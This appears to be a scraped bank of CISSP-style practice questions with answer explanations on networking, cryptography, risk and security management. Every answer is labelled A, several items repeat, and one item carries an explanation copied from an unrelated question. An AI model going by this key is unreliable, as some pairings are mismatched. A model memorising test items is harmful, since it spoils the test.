A. Rule-based intrusion detection is commonly associated with the use of an expert system. An expert system is made up of a knowledge base, an inference engine, and rule-based programming. Knowledge is represented as rules, and the data to be analyzed is referred to as facts. The knowledge of the system is written in rule-based programming (IF situation THEN action). These rules are applied to the facts, the data that comes in from a sensor, or a system that is being monitored. For example, an IDS pulls data from a system's audit log and stores it temporarily in its fact database. Then, the preconfigured rules are applied to this data to indicate whether anything suspicious is taking place. In our scenario, the rule states "IF a root user creates File1 AND creates File2 SUCH THAT they are in the same directory THEN there is a call to Administrative Tool TRIGGER send alert." This rule has been defined such that if a root user creates two files in the same directory and then makes a call to a specific administrative tool, an alert should be sent.

Use the following scenario to answer Questions 27-29. John is the manager of the security team within his company. He has learned that attackers have installed sniffers throughout the network without the company's knowledge. Along with this issue his team has also found out that two DNS servers had no record replication restrictions put into place and the servers have been caching suspicious name resolution data. Which of the following is the best countermeasure to put into place to help reduce the threat of network sniffers viewing network management traffic? A. SNMP v3 B. L2TP C. CHAP D. Dynamic packet-filtering firewall

A. SNMP versions 1 and 2 send their community string values in cleartext, but with version 3, cryptographic functionality has been added, which provides encryption, message integrity, and authentication security. So the sniffers that are installed on the network cannot sniff SNMP traffic.

Which of the following correctly describes the relationship between SSL and TLS? A. TLS is the open-community version of SSL. B. SSL can be modified by developers to expand the protocol's capabilities. C. TLS is a proprietary protocol, while SSL is an open-community protocol. D. SSL is more extensible and backward compatible with TLS.

A. Secure Sockets Layer (SSL) and Transport Layer Security (TLS) are cryptographic protocols that are used to secure communications by encrypting segments of network connections. Both protocols work at the session layer of IPv4, though (ISC)2 considers them presentation layer protocols because they provide encryption. TLS is the open-community version of SSL. Because TLS is an open-community protocol, its specifications can be modified by vendors within the community to expand what it can do and what technologies it can work with. SSL is a proprietary protocol, and TLS was developed by a standards body, making it an open-community protocol.

Pertaining to the CEO's security concerns, what should Lenny suggest the company put into place? A. Security event management software, an intrusion prevention system, and behavior-based intrusion detection B. Security information and event management software, an intrusion detection system, and signature-based protection C. An intrusion prevention system, security event management software, and malware protection D. An intrusion prevention system, security event management software, and war-dialing protection

A. Security event management software allows for network traffic to be viewed holistically by gathering log data centrally and analyzing it. The intrusion prevention system allows for proactive measures to be put into place to help in stopping malicious traffic from entering the network. Behavior-based intrusion detection can identify new types of attacks (zero day) compared to signature-based intrusion detection.

What is the difference between security training and security awareness training? A. Security training is focused on skills, while security awareness training is focused on recognizing and responding to issues. B. Security training must be performed, while security awareness training is an aspirational goal. C. Security awareness training is focused on security personnel, while security training is geared toward all users. D. There is no difference. These terms refer to the same process.

A. Security training is the process of teaching a skill or set of skills that will allow people to better perform specific functions. Security awareness training, on the other hand, is the process of exposing people to security issues so that they may be able to recognize them and better respond to them. Security training is typically provided to security personnel, while security awareness training should be provided to every member of the organization.

Since sending spam (unwanted messages) has increased over the years and e-mail has become a common way of sending out malicious links and malware, the industry has developed different ways to combat these issues. One approach is to use a Sender Policy Framework, which is an e-mail validation system. In the following graphic, what type of system receives the request in step 2 and replies in step 3? A. DNS Server. B. E-mail server C. radius server D. Authentication Server.

A. Sender Policy Framework (SPF) is an e-mail validation system designed to prevent spam and malicious e-mail by detecting e-mail spoofing. Attackers commonly spoof e-mail addresses to try and fool the receiver into thinking that the message came from a known and trusted source. SPF allows network administrators to specify which hosts are allowed to send mail from a given domain by implementing an SPF record in the Domain Name System (DNS). The e-mail server is configured to check with the DNS server to verify that an e-mail coming from a specific domain was sent from an IP address that has been sanctioned by the sending domain's administrator. In the graphic, step 2 is the e-mail server sending this validation request to a DNS server, and step 4 illustrates the resulting validation process that is followed.

Since sending spam (unwanted messages) has increased over the years and e-mail has become a common way of sending out malicious links and malware, the industry has developed different ways to combat these issues. One approach is to use a Sender Policy Framework, which is an e-mail validation system. In the following graphic, what type of system receives the request in step 2 and replies in step 3? A. DNS server B. E-mail server C.RADIUS server D. Authentication server

A. Sender Policy Framework (SPF) is an e-mail validation system designed to prevent spam and malicious e-mail by detecting e-mail spoofing. Attackers commonly spoof e-mail addresses to try and fool the receiver into thinking that the message came from a known and trusted source. SPF allows network administrators to specify which hosts are allowed to send mail from a given domain by implementing an SPF record in the Domain Name System (DNS). The e-mail server is configured to check with the DNS server to verify that an e-mail coming from a specific domain was sent from an IP address that has been sanctioned by the sending domain's administrator. In the graphic, step 2 is the e-mail server sending this validation request to a DNS server, and step 4 illustrates the resulting validation process that is followed.

Which factor is the most important item when it comes to ensuring security is successful in an organization? A. Senior management support B. Effective controls and implementation methods C. Updated and relevant security policies and procedures D. Security awareness by all employees

A. Senior management support

If the financial institution wants to force collusion to take place for fraud to happen successfully in this situation, what should Todd put into place? A. Separation of duties B. Rotation of duties C. Social engineering D. Split knowledge

A. Separation of duties

____________________ provides a machine-readable description of the specific operations provided by a specific web service. ____________________ provides a method for web services to be registered by service providers and located by service consumers. A. Web Services Description Language; Universal Description, Discovery and Integration B. Universal Description, Discovery and Integration; Web Services Description Language C. Web Services Description Language; Simple Object Access Protocol D. Simple Object Access Protocol; Universal Description, Discovery and Integration

A. Services within a service-oriented architecture (SOA) are usually provided through web services. A web service allows for web-based communication to happen seamlessly using web-based standards as in Simple Object Access Protocol (SOAP), HTTP, Web Services Description Language (WSDL), Universal Description, Discovery and Integration (UDDI), and Extensible Markup Language (XML). WSDL provides a machine-readable description of the specific operations provided by the service. UDDI is an XML-based registry that lists available services. UDDI provides a method for services to be registered by service providers and located by service consumers.

A disaster recovery procedure involving all affected departments acting out a specific scenario, but which does not go to an off-site facility, is referred to as: A. Simulation Test. B. Structure walk-through test. C. Checklist test. D. parallel test.

A. Simulation Test.

Which of the following statements is true with respect to preventing and/or detecting security disasters? A. Information security continuous monitoring (ISCM), defined by NIST Special Publication 800-137 as maintaining an ongoing awareness of your current security posture, vulnerabilities, and threats, is the best way to facilitate sound risk management decisions. B. Whitelisting allowed executables or, barring that, blacklisting known bad ones is the only effective means of preventing malware from compromising systems and causing a serious security breach. C. A rigorous regime of vulnerability and patch management can effectively eliminate the risk of known malware compromising critical corporate systems. D. By aggregating and correlating asset data and the security events concerning them, the deployment of a security information and event management (SIEM) system is the best way to ensure that attacks can be properly dealt with before they result in disaster. See the answer

A. Sound risk management is impossible without a thoroughgoing and current understanding of the effectiveness of the deployed controls vis-a-vis the current threats to extant vulnerabilities in the enterprise. Information security continuous monitoring (ISCM) seeks to provide this information on a truly ongoing basis, recognizing that new vulnerabilities are not discovered, nor do new threats to them emerge, on a quarterly basis. Rather, an agile and timely approach is needed to continuously ascertain, via heavy use of metrics and automation, how prepared we actually are, and how we can continuously improve our resilience to expected adversarial tactics, techniques, and procedures (TTPs)

Which of the following works similarly to stream ciphers? A.One-time pad B.AES C.Block D. RSA

A. Stream ciphers were developed to provide the same type of protection one-time pads do, which is why they work in such a similar manner. In practice, however, stream ciphers cannot provide the level of protection one-time pads do, but because stream ciphers are implemented through software and automated means, they are much more practical. A one-time pad is a perfect encryption scheme because it is considered unbreakable if implemented properly. This cipher uses a pad made up of random values. A plaintext message that needs to be encrypted is converted into bits, and a one-time pad is made up of random bits. This encryption process uses a binary mathematical function called exclusive-OR, usually abbreviated as XOR. XOR is an operation that is applied to two bits and is a function commonly used in binary mathematics and encryption methods. Stream ciphers also encrypt at the bit level, which is how they are similar to one-time pad encryption schemes.

Why are switched infrastructures safer environments than routed networks? A. It is more difficult to sniff traffic since the computers have virtual private connections. B. They are just as unsafe as nonswitched environments. C. The data link encryption does not permit wiretapping. D. Switches are more intelligent than bridges and implement security mechanisms.

A. Switched environments use switches to allow different network segments and/or systems to communicate. When this communication takes place, a virtual connection is set up between the communicating devices. Since it is a dedicated connection, broadcast and collision data are not available to other systems, as in an environment that uses only bridges and routers.

which of the following is a true difference between an asymmetric and symmetric algorithm? A. Symmetric algorithms are faster because they use substitution and transposition. B. Asymmetric algorithms are slower because they use substitution and transposition. C. Asymmetric algorithms are best implemented in hardware and symmetric in software. D. Asymmetric algorithms are more vulnerable to frequency analysis attacks.

A. Symmetric algorithms are faster because they use substitution and transposition.

Most operating systems and applications allow for administrators to configure the data that will be captured n audit logs for security purposes. Which of the following is the least important item to be captured in audit logs? A. System performance output data. B. Last user who accessed the device. C. Number of unsuccessful access attempts D. Number of successful access attempts.

A. System performance output data.

There are several different types of authentication technologies. Which type is being shown in the graphic that follows? A. 802.1X B. Extensible Authentication Protocol C. Frequency hopping spread spectrum D. Orthogonal frequency-division multiplexing

A. The 802.1X standard is a port-based network access control that ensures a user cannot make a full network connection until he is properly authenticated. This means a user cannot access network resources and no traffic is allowed to pass, other than authentication traffic, from the wireless device to the network until the user is properly authenticated. An analogy is having a chain on your front door that enables you to open the door slightly to identify a person who knocks before you allow him to enter your house. User authentication provides a higher degree of confidence and protection than system authentication.

John has been told that one of the applications installed on a web server within the DMZ accepts any length of information that a customer using a web browser inputs into the form the web server provides to collect new customer data. Which of the following describes an issue that John should be aware of pertaining to this type of vulnerability? A. Application is written in the C programming language. B. Application is not carrying out enforcement of the trusted computing base. C. Application is running in ring 3 of a ring-based architecture. D. Application is not interacting with the memory manager properly.

A. The C language is susceptible to buffer overflow attacks because it allows for direct pointer manipulations to take place. Specific commands can provide access to low-level memory addresses without carrying out bounds checking.

Which of the following best describes some of the issues that the evaluation testers most likely ran into while testing the submitted product? A. Nonprotected ROM sections B. Vulnerabilities that allowed malicious code to execute in protected memory sections C. Lack of a predefined and implemented trusted computing base D. Lack of a predefined and implemented security kernel

A. The C language is susceptible to buffer overflow attacks because it allows for direct pointer manipulations to take place. Specific commands can provide access to low-level memory addresses without carrying out bounds checking.

Hanna is a new security manager for a computer consulting company. She has found out that the company has lost intellectual property in the past because malicious employees installed rogue devices on the network, which were used to capture sensitive traffic. Hanna needs to implement a solution that ensures only authorized devices are allowed access to the company network. Which of the following IEEE standards was developed for this type of protection? A.IEEE 802.1AR B. IEEE 802.1AE C. IEEE 802.1AF D. IEEE 802.1XR

A. The IEEE 802.1AR standard specifies unique per-device identifiers (DevID) and the management and cryptographic binding of a device (router, switch, access point) to its identifiers. A verifiable unique device identity allows establishment of the trustworthiness of devices; thus, it facilitates secure device provisioning. A secure device identifier (DevID) is cryptographically bound to a device and supports authentication of the device's identity. Locally significant identities can be securely associated with an initial manufacturer-provisioned DevID and used in provisioning and authentication protocols to allow a network administrator to establish the trustworthiness of a device and select appropriate policies for transmission and reception of data and control protocols to and from the device.

Which of the following best describes the purpose of the Organisation for Economic Co-operation and Development (OECD)? A. An international organization that helps different governments come together and tackle the economic, social, and governance challenges of a globalized economy B. A national organization that helps different governments come together and tackle the economic, social, and governance challenges of a globalized economy C. An international organization that helps different organizations come together and tackle the economic, social, and governance challenges of a globalized economy D. A national organization that helps different organizations come together and tackle the economic, social, and governance challenges of a globalized economy

A. The OECD is an international organization that helps different governments come together and tackle the economic, social, and governance challenges of a globalized economy. Thus, the OECD came up with guidelines for the various countries to follow so data is properly protected and everyone follows the same type of rules.

Which of the following shows the layer sequence as layers 2, 5, 7, 4, and 3? A. Data link, session, application, transport, and network B. Data link, transport, application, session, and network C. Network, session, application, network, and transport D. Network, transport, application, session, and presentation

A. The OSI model is made up of seven layers: application (layer 7), presentation (layer 6), session (layer 5), transport (layer 4), network (layer 3), data link (layer 2), and physical (layer 1).

Encryption can happen at different layers of an operating system and network stack. Where does PPTP encryption take place? A. Data link layer B. Within applications C. Transport layer D. Data link and physical layers

A. The Point-to-Point Tunneling Protocol (PPTP) is a method for implementing virtual private networks (VPNs). It is a Microsoft-proprietary VPN protocol that works at the data link layer of the OSI model. PPTP can only provide a single connection and can only work over PPP connections

Lenny has a meeting with the internal software developers who are responsible for implementing the necessary functionality within the web-based system. Which of the following best describes the two items that Lenny needs to be prepared to discuss with this team? A. Service Provisioning Markup Language and the Extensible Access Control Markup Language B. Standard Generalized Markup Language and the Generalized Markup Language C. Extensible Markup Language and the Hypertext Markup Language D. Service Provisioning Markup Language and the Generalized Markup Language

A. The Service Provisioning Markup Language (SPML) allows company interfaces to pass service requests, and the receiving company provisions (allows) access to these services. Both the sending and receiving companies need to be following the XML standard, which will allow this type of interoperability to take place. When using the Extensible Access Control Markup Language (XACML), application security policies can be shared with other applications to ensure that both are following the same security rules. The developers need to integrate both of these language types to allow for their partner employees to interact with their inventory systems without having to conduct a second authentication step. The use of the languages can reduce the complexity of inventory control between the different companies.

John needs to ensure that his company's application can accept provisioning data from the company's partner's application in a standardized method. Which of the following best describes the technology that John should implement? A. Service Provisioning Markup Language B. Extensible Provisioning Markup Language C. Security Assertion Markup Language D. Security Provisioning Markup Language

A. The Service Provisioning Markup Language (SPML) allows for the exchange of provisioning data between applications, which could reside in one organization or many. SPML allows for the automation of user management (account creation, amendments, revocation) and access entitlement configuration related to electronically published services across multiple provisioning systems. This markup language allows for the integration and interoperation of service provisioning requests across various platforms.

The ______________ is an IETF-defined signaling protocol, widely used for controlling multimedia communication sessions such as voice and video calls over IP. A. Session Initiation Protocol B. Real-time Transport Protocol C. SS7 D. VoIP

A. The Session Initiation Protocol (SIP) is an IETF-defined signaling protocol, widely used for controlling multimedia communication sessions such as voice and video calls over IP. The protocol can be used for creating, modifying, and terminating two-party (unicast) or multiparty (multicast) sessions consisting of one or several media streams.

The main goal of the Wassenaar Arrangement is to prevent the buildup of military capabilities that could threaten regional and international security and stability. How does this relate to technology? A. Cryptography is a dual-use tool. B. Technology is used in weaponry systems. C. Military actions directly relate to critical infrastructure systems. D. Critical infrastructure systems can be at risk under this agreement.

A. The Wassenaar Arrangement implements export controls for "Conventional Arms and Dual-Use Goods and Technologies." The main goal of this arrangement is to prevent the buildup of military capabilities that could threaten regional and international security and stability. So everyone is keeping an eye on each other to make sure no one country's weapons can take everyone else out. One item the agreement deals with is cryptography, which is seen as a dual-use good. It can be used for military and civilian uses. It is seen to be dangerous to export products with cryptographic functionality to countries that are in the "offensive" column, meaning that they are thought to have friendly ties with terrorist organizations and/or want to take over the world through the use of weapons of mass destruction.

Which of the following best describes the consortium Trent's boss wants him to join? A. Nonprofit organization that produces open-source software and follows widely agreed-upon best-practice security standards for the World Wide Web B. U.S. DHS group that provides best practices, tools, guidelines, rules, principles, and other resources for software developers, architects, and security practitioners to use C. Group of experts who create proprietary software tools used to help improve the security of software worldwide D. Group of experts and organizations who certify products based on an agreed-upon security criteria

A. The Web Application Security Consortium (WASC) is a nonprofit organization made up of an international group of experts, industry practitioners, and organizational representatives who produce open-source and widely agreed-upon best-practice security standards for the World Wide Web.

There are many enterprise architecture models that have been developed over the years for specific purposes. Some of them can be used to provide structure for information security processes and technology to be integrated throughout an organization. Which of the following provides an incorrect mapping between the architect type and the associated definition? A. Zachman Framework Model and methodology for the development of information security enterprise architectures B. TOGAF Model and methodology for the development of enterprise architectures developed by The Open Group C. DoDAF U.S. Department of Defense architecture framework that ensures interoperability of systems to meet military mission goals D. MODAF Architecture framework used mainly in military support missions developed by the British Ministry of Defence

A. The Zachman Framework is for business enterprise architectures, not security enterprises. The proper definition mappings are as follows: Zachman Framework Model for the development of enterprise architectures developed by John Zachman TOGAF Model and methodology for the development of enterprise architectures developed by The Open Group DoDAF U.S. Department of Defense architecture framework that ensures interoperability of systems to meet military mission goals MODAF Architecture framework used mainly in military support missions developed by the British Ministry of Defence SABSA model Model and methodology for the development of information security enterprise architectures

Henry is the team leader of a group of software designers. They are at a stage in their software development project where they need to reduce the amount of code running, reduce entry points available to untrusted users, reduce privilege levels as much as possible, and eliminate unnecessary services. Which of the following best describes the first step the team needs to carry out to accomplish these tasks? A. Attack surface analysis B. Software development life cycle C. Risk assessment D. Unit testing

A. The aim of an attack surface analysis is to identify and reduce the amount of code accessible to untrusted users. The basic strategies of attack surface reduction are to reduce the amount of code running, reduce entry points available to untrusted users, reduce privilege levels as much as possible, and eliminate unnecessary services. Attack surface analysis is generally carried out through specialized tools to enumerate different parts of a product and aggregate their findings into a numerical value. Attack surface analyzers scrutinize files, registry keys, memory data, session information, processes, and services details.

Jill is establishing a companywide sales program that will require different user groups with different privileges to access information on a centralized database. How should the security manager secure the database? A. Increase the database's security controls and provide more granularity. B. Implement access controls that display each user's permissions each time they access the database. C. Change the database's classification label to higher security status. D. Decrease the security so that all users can access the information as needed. See the answer

A. The best approach to securing the database in this situation would be to increase the controls and assign very granular permissions. These measures would ensure that users cannot abuse their privileges and that the confidentiality of the information would be maintained. The granularity of permissions gives network administrators and security professionals additional control over the resources they are charged with protecting, and a fine level of detail enables them to give individuals just the precise level of access they need.

Why would an organization need to periodically test disaster recovery and business continuity plans if they've already been shown to work? A. Environmental changes may render them ineffective over time. B. It has low confidence in the abilities of the testers. C. To appease senior leadership. D. Resources may not be available in the future to test again.

A. The best reason to periodically test DRPs and BCPs is to assess the effects of internal or external environment changes on them. Changes to these plans are inevitable and often frequently required, which puts an organization at risk of unacceptably long system outages if it doesn't periodically test its DRPs/BCPs.

Which world legal system of law is used in continental European countries, such as France and Spain, and is rule-based law, not precedence based? A. Civil (code) law system B. Common law system C. Customary law system D. Mixed law system

A. The civil (code) law system is used in continental European countries such as France and Spain. It is a different legal system from the common law system used in the United Kingdom and United States. A civil law system is rule-based law, not precedent based. For the most part, a civil law system is focused on codified law—or written laws.

When conducting a quantitative risk analysis, items are gathered and assigned numeric values so that cost/benefit analysis can be carried out. Which of the following provides the correct formula to understand the value of a safeguard? A. (ALE before implementing safeguard) - (ALE after implementing safeguard) - (annual cost of safeguard) = value of safeguard to the company (B. ALE before implementing safeguard) - (ALE during implementing safeguard) - (annual cost of safeguard) = value of safeguard to the company C. (ALE before implementing safeguard) - (ALE while implementing safeguard) - (annual cost of safeguard) = value of safeguard to the company D. (ALE before implementing safeguard) - (ALE after implementing safeguard) - (annual cost of asset) = value of safeguard to the company

A. The correct formula for cost/benefit analysis is (ALE before implementing safeguard) - (ALE after implementing safeguard) - (annual cost of safeguard) = value of safeguard to the company.

What is the purpose of the Logical Link Control (LLC) layer in the OSI model? A. Provides a standard interface for the network layer protocol B. Provides the framing functionality of the data link layer C. Provides addressing of the packet during encapsulation D. Provides the functionality of converting bits into electrical signals

A. The data link layer has two sublayers: the Logical Link Control (LLC) and Media Access Control (MAC) layers. The LLC provides a standard interface for whatever network protocol is being used. This provides an abstraction layer so that the network protocol does not need to be programmed to communicate with all of the possible MAC-level protocols (Ethernet, Token Ring, WLAN, FDDI, etc.).

A company needs to implement a CCTV system that will monitor a large area outside the facility. Which of the following is the correct lens combination for this? A. A wide-angle lens and a small lens opening B. A wide-angle lens and a large lens opening C. A wide-angle lens and a large lens opening with a small focal length D. A wide-angle lens and a large lens opening with a large focal length

A. The depth of field refers to the portion of the environment that is in focus when shown on the monitor. The depth of field varies depending upon the size of the lens opening, the distance of the object being focused on, and the focal length of the lens. The depth of field increases as the size of the lens opening decreases, the subject distance increases, or the focal length of the lens decreases. So if you want to cover a large area and not focus on specific items, it is best to use a wide-angle lens and a small lens opening.

A company needs to implement a CCTV system that will monitor a large area of the facility. Which of the following is the correct lens combination for this? A. A wide-angle lens and a small lens opening B. A wide-angle lens and a large lens opening C. A wide-angle lens and a large lens opening with a small focal length D. A wide-angle lens and a large lens opening with a large focal length

A. The depth of field refers to the portion of the environment that is in focus when shown on the monitor. The depth of field varies, depending upon the size of the lens opening, the distance of the object being focused on, and the focal length of the lens. The depth of field increases as the size of the lens opening decreases, the subject distance increases, or the focal length of the lens decreases. So if you want to cover a large area and not focus on specific items, it is best to use a wide-angle lens and a small lens opening.

Within biometric authentication, what is a Type II error rate? A. The rate of errors where the system falsely accepts the authentication of an individual who is not who they purport to be B. The rate of errors where the system falsely rejects the authentication of an individual who is who they purport to be C. The rate of errors that the system produces where false rejections and false acceptances are equal D. The rate of errors where the system fails to either accept or reject the authentication of an individual regardless of their validity

A. The false acceptance rate (FAR) is the rate of Type II errors within a biometric system and represents the rate at which a system accepts impostors who should have been declined access. These are the most critical errors a biometric system should be tuned to minimize.

Which of the following is the second level of the Capability Maturity Model Integration? A. Repeatable B. Defined C. Managed D. Optimizing

A. The five levels of the Capability Maturity Integration Model are Initial Development process is ad hoc or even chaotic. The company does not use effective management procedures and plans. There is no assurance of consistency, and quality is unpredictable. Success is usually the result of individual heroics. Repeatable A formal management structure, change control, and quality assurance are in place. The company can properly repeat processes throughout each project. The company does not have formal process models defined. Defined Formal procedures are in place that outline and define processes carried out in each project. The organization has a way to allow for quantitative process improvement. Managed The company has formal processes in place to collect and analyze quantitative data, and metrics are defined and fed into the process-improvement program. Optimizing The company has budgeted and integrated plans for continuous process improvement.

ActiveX Data Objects (ADO) is an API that allows applications to access back-end database systems. It is a set of ODBC interfaces that exposes the functionality of data sources through accessible objects. Which of the following are incorrect characteristics of ADO? It's a low-level data access programming interface to an underlying data access technology (such as OLE DB). It's a set of COM objects for accessing data sources, not just database access. It allows a developer to write programs that access data without knowing how the database is implemented. SQL commands are required to access a database when using ADO. A. i, iv B. ii, iii C. i, ii, iii D. i, ii, iii, iv

A. The following are correct characteristics of ADO: It's a high-level data access programming interface to an underlying data access technology (such as OLE DB). It's a set of COM objects for accessing data sources, not just database access. It allows a developer to write programs that access data without knowing how the database is implemented. SQL commands are not required to access a database when using ADO.

Fred is a new security officer who wants to implement a control for detecting and preventing users who attempt to exceed their authority by misusing the access rights that have been assigned to them. Which of the following best fits this need? A. Management review B. Two-factor identification and authentication C. Capturing this data in audit logs D. implementation of a strong security policy

A. The goal of this question is for you to realize that management and supervisor involvement is critical to ensure that these types of things do not take place or are properly detected and acted upon if they do take place. If the users know that management will take action if they misbehave, this can be considered preventive in nature. The activities will only be known of after they take place, which means that the security office has to carry out some type of detective activity so that he can then inform management.

Why are security metrics so important as performance and/or risk indicators? A. They enable management to understand the performance of a security program. B. They can be used to document deviations from standards. C. They can help auditors determine whether incidents have been properly resolved. D. They can be used to determine the cost of a countermeasure.

A. The greatest value of security metrics is to establish the key performance indicators (KPIs) and key risk indicators (KRIs) that must be used by senior management to evaluate the effectiveness of an information security management system (ISMS). The best way to determine whether such a program is actually improving the security posture of an enterprise and reducing overall risk is through longitudinal tracking of quantified data.

Which of the following best describes "change management?" A. It is a systematic approach to deliberately regulating the changing nature of projects. B. It is the process of controlling the specific changes that take place during the life cycle of a system. C. It is an enterprise program for instituting programmatic changes in source code repositories. D. It is the process of controlling how changes to firewalls and other network devices are made.

A. The key words here are "systematic" and "deliberately." In any enterprise IT infrastructure, there will be a fairly constant stream of projects that introduce changes from small to potentially immense. Managing them effectively, and in a way that is controlled and sustainable, requires their disciplined regulation. This is especially important when one considers that unmanaged, ad hoc changes of this nature inevitably adversely impact security controls, which are commonly static in deployment and configuration.

A passphrase is turned into a virtual password, but what exactly is a virtual password? A. The length and format that is required for a specific system or application. B. when a passphrase is turned into an encryption key. C. a hashed version of the passphrase. D. An encrypted version of the passphrase.

A. The length and format that is required for a specific system or application.

A passphrase is turned into a virtual password, but what is exactly is a virtual password? A. The length and format that is required for a specific system or application. B. When a passphrase is turned into an encryption key C. A hashed version of the passphrase D. An encrypted version of the passphrase.

A. The length and format that is required for a specific system or application.

Which of the following is the most important criterion in determining the classification of data? A. The level of damage that could be caused if the data were disclosed B. The likelihood that the data will be accidentally or maliciously disclosed C. Regulatory requirements in jurisdictions within which the organization is not operating D. The cost of implementing controls for the data

A. The level of damage that could be caused if the data were disclosed

Marge has to choose a software development methodology that her team should follow. The application that her team is responsible for developing is a critical application that can have few to no errors. Which of the following best describes the type of methodology her team should follow? A. Cleanroom B. Joint Analysis Development (JAD) C. Rapid Application Development (RAD) D. Reuse methodology

A. The listed software development methodologies and their definitions are as follows: Joint Analysis Development (JAD) A methodology that uses a team approach in application development in a workshop-oriented environment. Rapid Application Development (RAD) A methodology that combines the use of prototyping and iterative development procedures with the goal of accelerating the software development process. Reuse methodology A methodology that approaches software development by using progressively developed code. Reusable programs are evolved by gradually modifying pre-existing prototypes to customer specifications. Since the reuse methodology does not require programs to be built from scratch, it drastically reduces both development cost and time. Cleanroom An approach that attempts to prevent errors or mistakes by following structured and formal methods of developing and testing. This approach is used for high-quality and critical applications that will be put through a strict certification process.

When classifying information, its criticality refers to: A. The magnitude of damage or loss an organization would sustain if the information was lost or made unavailable. B. The magnitude of damage or loss an organization would sustain if the information was revealed to unauthorized individuals. C. The ways in which an organization protects its information from third parties. D. The ways in which an organization protects its information from internal abuse.

A. The magnitude of damage or loss an organization would sustain if the information was lost or made unavailable.

Deleting a file typically produces which result? A. The marking of the area of disk where the file was stored as reusable. B. The erasure of the metadata about the file, though not the file. C. The erasure of the area of disk where the file was stored. D. The eradication of all metadata about the file.

A. The marking of the area of disk where the file was stored as reusable.

Countries around the world are focusing on cyber warfare and how it can affect their utility and power grid infrastructures. Securing water, power, oil, gas, transportation, and manufacturing systems is an increasing priority for governments. These critical infrastructures are made up of different types of industrial control systems (ICS) that provide this type of functionality. Which of the following answers is not considered a common ICS? A. Central control systems B. Programmable logic controllers C. Supervisory control and data acquisition D. Distributed control systems

A. The most common types of industrial control systems (ICS) are distributed control systems (DCSs), programmable logical controllers (PLCs), and supervisory control and data acquisition (SCADA) systems. While these systems provide a type of central control functionality, this is not considered a common type of ICS because these systems are distributed in nature. DCSs are used to control product systems for industries such as water, electrical, and oil refineries. The DCS uses a centralized supervisory control loop to connect controllers that are distributed throughout a geographic location. The supervisor controllers on this centralized loop request status data from field controllers and feed this information back to a central interface for monitoring. The status data captured from sensors can be used in failover situations. The DCS can provide redundancy protection through a modular approach. This reduces the impact of a single fault, meaning that if one portion of the system went down, the whole system would not be down.

Which of the following has an incorrect attack-to-definition mapping? A. EBJ XSS attack Content processing stages performed by the client, typically in client-side Java. B. Nonpersistent XSS attack Improper sanitation of response from a web client. C. Persistent XSS attack Data provided by attackers is saved on the server. D. DOM-based XSS attack Content processing stages performed by the client, typically in client-side JavaScript.

A. The nonpersistent cross-site scripting vulnerability is when the data provided by a web client, most commonly in HTTP query parameters or in HTML form submissions, is used immediately by server-side scripts to generate a page of results for that user without properly sanitizing the response. The persistent XSS vulnerability occurs when the data provided by the attacker is saved by the server and then permanently displayed on "normal" pages returned to other users in the course of regular browsing without proper HTML escaping. DOM-based vulnerabilities occur in the content processing stages performed by the client, typically in client-side JavaScript.

An operating system has many different constructs to keep all of the different execution components in the necessary synchronization. One construct the operating system maintains is a process table. Which of the following best describes the role of a process table within an operating system? A. The table contains information about each process that the CPU uses during the execution of the individual processes' instructions. B. The table contains memory boundary addresses to ensure that processes do not corrupt each other's data. C. The table contains condition bits that the CPU uses during state transitions. D. The table contains I/O and memory addresses.

A. The operating system keeps a process table, which has one entry per process. The table contains each individual process's state, stack pointer, memory allocation, program counter, and status of open files in use. The reason the operating system documents all of this status information is that the CPU needs all of it loaded into its registers when it needs to interact with, for example, process 1. The CPU uses this information during the execution activities for specific processes.

Which of the following is a requirement for a secure vernam cipher? A. The pad must be used just one time. B. A symmetric key must be encrypted with an symmetric key. C. The private key must be only known to the owner. D. it needs to hide the existence of a message.

A. The pad must be used just one time.

Which of the following is a true statement pertaining to memory addressing? A. The CPU uses absolute addresses. Applications use logical addresses. Relative addresses are based on a known address and an offset value. B. The CPU uses logical addresses. Applications use absolute addresses. Relative addresses are based on a known address and an offset value. C. The CPU uses absolute addresses. Applications use relative addresses. Logical addresses are based on a known address and an offset value. D. The CPU uses absolute addresses. Applications use logical addresses. Absolute addresses are based on a known address and an offset value.

A. The physical memory addresses that the CPU uses are called absolute addresses. The indexed memory addresses that software uses are referred to as logical addresses. A relative address is a logical address that incorporates the correct offset value.

When developing a recovery and continuity program within an organization, different metrics can be used to properly measure potential damages and recovery requirements. These metrics help us quantify our risks and the benefits of controls we can put into place. Two metrics commonly used in the development of recovery programs are recovery point objective (RPO) and recovery time objective (RTO). Data restoration (RPO) requirements can be different from service restoration (RTO) requirements. Which of the following best defines these two main recovery measurements in this type of scenario? A. RPO is the acceptable amount of data loss measured in time. RTO is the acceptable time period before a service level must be restored. B. RTO is the earliest time period in which a data set must be restored. RPO is the acceptable amount of downtime in a given period. C. RPO is the acceptable amount of data loss measured in time. RTO is the earliest time period in which data must be restored. D. RPO is the acceptable amount of downtime measured. RTO is the earliest time period in which a service level must be restored.

A. The recovery point objective (RPO) is the acceptable amount of data loss measured in time. This value represents the earliest point in time by which data must be recovered. The higher the value of data, the more funds or other resources that can be put into place to ensure a smaller amount of data is lost in the event of a disaster. For example, if the RPO is set to two hours, this means that the organization has to have backup and restore processes that will only allow for the loss of up to two hours of data. The restore process cannot be something as time consuming as restoring from a backup tape manually, but will need to be an automated restoration process that can restore data more quickly and allow the production environment to be up and running and carrying out business processes. The recovery time objective (RTO) is the acceptable period before a specific service level must be restored in order to avoid unacceptable consequences after a disruption or disaster. While RPO pertains to data, RTO deals with the actual processing capabilities of an environment.

Which of the following correctly describes the relationship between the reference monitor and the security kernel? A. The security kernel implements and enforces the reference monitor. B. The reference monitor is the core of the trusted computing base, which is made up of the security kernel. C. The reference monitor implements and enforces the security kernel. D. The security kernel, aka abstract machine, implements the reference monitor concept.

A. The security kernel implements and enforces the reference monitor.

What takes place at the session layer? A. Dialog control B. Routing C. Packet sequencing D. Addressing

A. The session layer is responsible for controlling how applications communicate, not how computers communicate. Not all applications use protocols that work at the session layer, so this layer is not always used in networking functions. A session layer protocol will set up the connection to the other application logically and control the dialog going back and forth. Session layer protocols allow applications to keep track of the dialog.

The Logistics Agency of a country's department of defense is responsible for ensuring that all necessary materials get to the proper locations to support the department's day-to-day activities. The data that this agency maintains must be protected according to the three main security principles of security controls. For this agency's responsibilities, which security principle has the highest priority? A. Confidentiality B. Integrity C. Availability D. Privacy

